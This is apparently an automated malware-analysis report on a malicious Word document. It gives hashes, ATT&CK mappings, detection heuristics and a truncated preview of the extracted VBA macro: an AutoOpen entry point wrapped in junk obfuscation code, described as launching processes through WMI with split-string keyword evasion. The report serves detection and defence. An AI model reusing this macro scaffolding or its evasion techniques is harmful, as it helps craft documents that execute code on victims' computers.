Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 90c260b2469174d1…

MALICIOUS

Office (OLE)

189.0 KB Created: 2019-04-16 07:52:00 Authoring application: Microsoft Office Word First seen: 2020-02-04
MD5: ae371e5d507b6d56a2cedae7d4acf7f2 SHA-1: 0f494abea718c897e92226cac4826ca9a44f1955 SHA-256: 90c260b2469174d1c60fca12bc1a31728a1219a71c5f27a5b1cf21db2271f123
342 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1059 Command and Scripting Interpreter T1203 Exploitation for Client Execution

The sample contains a VBA macro with an autoopen subroutine, which is a common technique for executing malicious code upon opening a document. The macro utilizes GetObject and CreateObject to launch the 'Win32_Process' WMI class, specifically calling the 'Create' method. This indicates an attempt to execute arbitrary commands or launch other malicious processes. The obfuscation of 'winmgmts' by splitting string literals further suggests malicious intent.

Heuristics 9

  • ClamAV: Doc.Malware.00536d-6943632-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.00536d-6943632-0
  • VBA macros detected medium 5 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA WMI Win32_Process launcher critical OLE_VBA_WMI_PROCESS_CREATE
    VBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
  • Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATION
    VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 29919 bytes
SHA-256: 5fbb47236ae0f54e833181206c69db291fc3c7461639b8b6aae16dd098abaab8
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "MG1AX1"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "axoZwZ"
Attribute VB_Base = "0{C048E48B-2750-47EE-AD27-3D21AD99F581}{AC90A0B1-A6E9-49BA-ADE5-D67CF5FB9B4A}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "JCZXQ4"
Attribute VB_Base = "0{8645C7D1-CB6E-4A8B-A8B4-B0066A491CFC}{C6B5E892-E6D6-42AD-9367-30CF0C3F8CBA}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "ow4UCA"
Sub autoopen()
   If NAc4AwAD = wAUGAA Then
      Select Case GQAAAwA
         Case 167068954
            CQkQUU = Rnd(RABDBw + 650495095 + 371117463 / wDQ1AAQA)
            zA1AA1Ax = CByte(rAUAUDo + 20487845 + fA1UXUDA + 505403680)
         Case 387900406
            T1k4Z1C = hXQAAc
            uoQQDUA = Tan(D_A1ZQUA - CSng(zDBBDA))
      End Select
End If
   If j_BBBAQ = aA_DAk Then
      Select Case EAwAXBQG
         Case 5402959
            zBAw4AAA = Rnd(WZDxCQQA + 676616036 + 512829881 / tZo4AA4)
            sDUAX_ = CByte(XDADBAwo + 138834269 + zCAAUD + 958147293)
         Case 571616047
            UAABABAA = EBowkDZA
            mkX1DwQA = Tan(Lo4BAA4Q - CSng(pwDZwA))
      End Select
End If
X14_BU1
   If BAZXBccA = nAQDAwA Then
      Select Case CAAUDx
         Case 943859877
            XCwUAxkZ = Rnd(KAAkBw + 544252862 + 395633711 / TXAUAc)
            aAAA4wD = CByte(CxQwkB + 155554610 + uw4XQAAk + 356396423)
         Case 238531479
            wDAQcwx = vAxCZUcx
            FDBDDxA = Tan(Y_okkQD - CSng(jADAAA))
      End Select
End If
   If uCBGA4Q = ADAUAoXA Then
      Select Case JAAAkDo
         Case 483674180
            I4wAwAAx = Rnd(LQABQA + 891862522 + 573333373 / pkCQZA)
            m1XkAU4U = CByte(aAUXAQA + 661755591 + Zc_1cZ + 94742458)
         Case 52062674
            o_AZ1ZB = lcDcQA
            jBA1BA = Tan(nAoAA4 - CSng(Z4ABwoAG))
      End Select
End If
End Sub

Attribute VB_Name = "SkcCADX"
Function X14_BU1()
On Error Resume Next
   If tZXkXA = uACBZGB Then
      Select Case R4xADQ
         Case 199961955
            N_ZZAA = Rnd(wB44BZ + 892411673 + 494534649 / m4UUDXk_)
            ZQAc4XA = CByte(UBAcAU + 5806753 + nDkAwA_ + 888489361)
         Case 284077123
            RUAZA4 = jcUAGU
            kA1UDCAU = Tan(IQGQUo - CSng(nxUQBB))
      End Select
End If
   If uAZAoAo = j4XQcwx Then
      Select Case j1XBc1Q
         Case 584221840
            LXBAGA = Rnd(so_BxC + 418538847 + 791559013 / TXXU4A)
            LAAw_1 = CByte(DkBQZ_UA + 163227692 + p1wAXkZX + 675427222)
         Case 980059429
            fDQBw4A = w1o1CU
            ZxwB1CBc = Tan(FCDXAw - CSng(lcA_QQ))
      End Select
End If
   If FADZwZ = KQBAocxA Then
      Select Case OkDkUDx
         Case 906361846
            UA1BUx = Rnd(PcoA_oA + 585722260 + 185414287 / tQoAkAD)
            RcZAA1UB = CByte(vBQAAA + 494558293 + XUAA4BAA + 498426341)
         Case 314639635
            QA_A1Z = I_XkAZ
            uAA44A = Tan(bDoQAAA - CSng(w4QDBA))
      End Select
End If
If 7926 < 83936 Then
PGGUUxA = vbFalse
   If MoCoXAGo = rAUAwU Then
      Select Case MoQBGA_
         Case 599929272
            wDA1_DDB = Rnd(VAQ11AD + 710572197 + 341868934 / hkxUACU)
            V4AACZ = CByte(JDUGGcX + 824028117 + doQAAAD + 295595727)
         Case 957124950
            hUCDxxA = SQABQc4U
            soUAAA = Tan(RZBABQC - CSng(W1ACDAAA))
      End Select
End If
   If VAZAUB = S1XQAAo Then
      Select Case qBCBAoAA
         Case 733598475
            JAwxAAx = Rnd(VxQcA
... (truncated)